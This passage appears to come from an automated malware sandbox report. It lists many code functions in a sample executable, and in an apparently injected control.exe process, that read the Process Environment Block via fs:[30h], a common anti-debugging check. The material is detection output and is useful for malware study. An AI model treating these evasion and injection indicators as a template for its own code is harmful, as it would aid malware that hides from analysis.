          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01493884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01493884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01443B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01443B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01414F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01414F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01421B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01421B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01428794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0145927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01448E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01428A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01415210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01415210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01415210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01415210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01433A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01454A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01454A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01458EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04750050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04750050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04808CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0480740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0480740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0480740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04804015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04804015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04801074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04757D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_048005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_048005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04773D43 mov eax, dword ptr fs:[00000030h]
